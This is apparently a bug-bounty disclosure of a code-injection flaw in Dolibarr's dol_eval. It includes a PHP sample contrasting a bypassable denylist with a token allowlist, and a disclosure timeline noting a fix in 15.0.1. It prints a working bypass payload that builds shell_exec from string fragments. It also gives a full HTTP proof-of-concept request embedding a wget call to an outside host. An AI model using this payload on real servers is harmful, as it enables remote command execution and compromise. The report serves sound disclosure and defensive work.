Code Injection in dolibarr/dolibarr

Valid

Reported on

Feb 28th 2022


Description

Improper sanitization of PHP function names allows an authenticated user to inject arbitrary PHP code and run arbitrary operating-system commands on the server. In the function "dol_eval" in file "dolibarr/htdocs/core/lib/functions.lib.php", dangerous PHP functions are removed from the expression with "str_replace" before the expression is passed to eval. A substring denylist of this kind only matches a function name that is written out contiguously, so it is bypassed by assembling the name from string fragments at runtime: PHP concatenates the fragments and then calls the resulting string as a function. The following value in the $s parameter does exactly that:

('she'.'ll_'.'ex'.'ec')('<ANY SYSTEM SHELL COMMAND HERE>')
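The weakness described above, as an added example that is not Dolibarr's code: a str_replace() denylist of the kind the report describes, the concatenation payload it misses, and a token-based allowlist that rejects any callee that is not a plain, explicitly permitted identifier. The function and variable allowlists, the isModEnabled name and the llx_menu-shaped sample rows are assumptions chosen for the illustration, not values taken from the project.

```php
<?php
// Added example, not Dolibarr's code. It reproduces the class of weakness
// described in the report (a str_replace() denylist over an expression that
// is later eval()ed) and shows a token-based allowlist that closes the bypass.
// All allowlists and sample rows below are hypothetical, chosen for this example.

// 1. Weak: strip known-dangerous function names as substrings.
//    The check only sees a name that is written out contiguously.
function denylistSanitize(string $s): string
{
    $forbidden = ['shell_exec', 'exec', 'system', 'passthru', 'popen', 'proc_open'];
    return str_replace($forbidden, '', $s);
}

// 2. Stronger: tokenize the expression with PHP's own lexer and accept only
//    what a menu "perms"/"enabled" condition needs. Every other token kind,
//    every unknown variable and every unknown callee is rejected, and a call
//    whose callee is a string literal, a variable or a parenthesised
//    expression is treated as a dynamic call and rejected.
function isSafeCondition(string $s): bool
{
    $allowedFunctions = ['isModEnabled'];                    // hypothetical allowlist
    $allowedVariables = ['$user', '$conf', '$langs'];        // hypothetical allowlist
    $allowedTokens = [
        T_OPEN_TAG, T_WHITESPACE, T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DNUMBER,
        T_STRING, T_VARIABLE, T_OBJECT_OPERATOR, T_BOOLEAN_AND, T_BOOLEAN_OR,
        T_IS_EQUAL, T_IS_NOT_EQUAL, T_IS_IDENTICAL, T_IS_NOT_IDENTICAL,
        T_IS_GREATER_OR_EQUAL, T_IS_SMALLER_OR_EQUAL,
    ];
    $allowedChars = ['(', ')', '.', '!', '<', '>', ',', ';'];

    $prev = null;   // previous significant token: [id, text, line] or a one-char string
    foreach (token_get_all('<?php ' . $s . ';') as $tok) {
        if (is_array($tok)) {
            [$id, $text] = $tok;
            if (!in_array($id, $allowedTokens, true)) {
                return false;    // eval, include, new, casts, `backticks`, ${...}, heredocs, ...
            }
            if ($id === T_VARIABLE && !in_array($text, $allowedVariables, true)) {
                return false;    // $_GET, $GLOBALS, $this, ...
            }
            if ($id !== T_OPEN_TAG && $id !== T_WHITESPACE) {
                $prev = $tok;
            }
            continue;
        }
        if (!in_array($tok, $allowedChars, true)) {
            return false;        // $, {, }, [, ], ", =, +, -, ...
        }
        if ($tok === '(') {
            // ('she'.'ll_'.'ex'.'ec')('id'), ('shell_exec')('id') and $f('id')
            if ($prev === ')' || (is_array($prev) && in_array($prev[0], [T_CONSTANT_ENCAPSED_STRING, T_VARIABLE], true))) {
                return false;
            }
            // shell_exec('id'), assert('...') and any method call not on the allowlist
            if (is_array($prev) && $prev[0] === T_STRING && !in_array($prev[1], $allowedFunctions, true)) {
                return false;
            }
        }
        $prev = $tok;
    }
    return true;
}

// 3. Audit helper: flag stored menu conditions that fail the check. The rows
//    are constructed for this example in the shape of llx_menu's perms/enabled
//    columns; they are not real data.
function auditMenuConditions(array $rows): array
{
    $flagged = [];
    foreach ($rows as $row) {
        foreach (['perms', 'enabled'] as $field) {
            if ($row[$field] !== '' && !isSafeCondition($row[$field])) {
                $flagged[] = [$row['rowid'], $field, $row[$field]];
            }
        }
    }
    return $flagged;
}

$payload = "('she'.'ll_'.'ex'.'ec')('id')";   // the report's payload with a harmless command
$rows = [   // constructed sample rows
    ['rowid' => 1, 'perms' => '$user->rights->societe->lire', 'enabled' => "isModEnabled('societe')"],
    ['rowid' => 2, 'perms' => $payload, 'enabled' => '1'],
    ['rowid' => 3, 'perms' => "shell_exec('id')", 'enabled' => ''],
];

echo "denylist leaves payload unchanged: ", var_export(denylistSanitize($payload) === $payload, true), "\n";
echo "token check accepts payload:      ", var_export(isSafeCondition($payload), true), "\n";
foreach (auditMenuConditions($rows) as [$rowid, $field, $expr]) {
    echo "row $rowid: unsafe $field condition: $expr\n";
}
```

Run it with the php command-line binary. The denylist hands the payload back unchanged, because no forbidden name occurs as a contiguous substring of it; the token check rejects the payload (a call whose callee is a parenthesised expression) and the direct shell_exec call, and accepts the two benign conditions. The design point is structural: reject everything that is not explicitly expected instead of searching for known-bad names, and apply the same check to every field that ends up in dol_eval, not only the one the proof of concept uses.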

Proof of Concept

A user with the right to add menus to the system can exploit this vulnerability with the following request. The payload is supplied in the perms field of the new menu entry; Dolibarr stores it and passes it to dol_eval when it builds the menu to decide whether the entry is visible, so the command is executed on the server when the menu is rendered.

POST /htdocs/admin/menus/edit.php?action=add&token=84da28fc90b6abc2238f2e0da2e5ee10&menuId=0 HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Referer: http://192.168.255.78/dolibarr/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=eldy&backtopage=%2Fdolibarr%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php
Cookie: <COOKIE>
Upgrade-Insecure-Requests: 1

token=84da28fc90b6abc2238f2e0da2e5ee10&menu_handler=all&user=2&type=top&propertymainmenu=testtest&titre=testtest&url=testtest&langs=&position=100&target=&enabled=1&perms=%28%27she%27.%27ll_%27.%27ex%27.%27ec%27%29%28%27wget+https%3A%2F%2F<REDACTED>%27%29&save=Save

Impact

An authenticated user who is allowed to add menus can execute arbitrary PHP code and arbitrary operating-system commands on the server with the privileges of the web server process.

We are processing your report and will contact the dolibarr team within 24 hours.
We have contacted a member of the dolibarr team and are waiting to hear back.
Laurent Destailleur validated this vulnerability.
d3addog has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Laurent Destailleur marked this as fixed in 15.0.1 with commit 2a48dd.
Laurent Destailleur has been awarded the fix bounty.
This vulnerability will not receive a CVE.